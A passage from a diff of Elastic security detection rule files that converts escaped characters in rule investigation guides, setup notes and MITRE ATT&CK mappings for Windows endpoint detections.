for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json index 9b4471430b7..49ec3899690 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json index 7a40986c66f..dbc4890a686 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json index 5962dbab311..c79df78111b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json index 62ee5bd1093..87bcd61452d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json index 9032178a404..88bcb4c44c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json index 36d553b5d17..7fa8b6ee28c 100644 --- a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json index b48e55f48ff..1172b540ee5 100644 --- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json index fe01a951f1a..7057f1eb2c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json index cbe495fb4da..0950fd65bc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json index 2701de382fa..274a6be13af 100644 --- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json +++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json index 40419103095..0e2d4bfa516 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json +++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json @@ -43,7 +43,7 @@ ], "risk_score": 21, "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json index 994fa3efaf3..a4be95e0774 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json +++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json @@ -42,7 +42,7 @@ ], "risk_score": 21, "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json index 15353c528b0..e56516730ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json index 59913ed2f9e..3ece37c48d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script 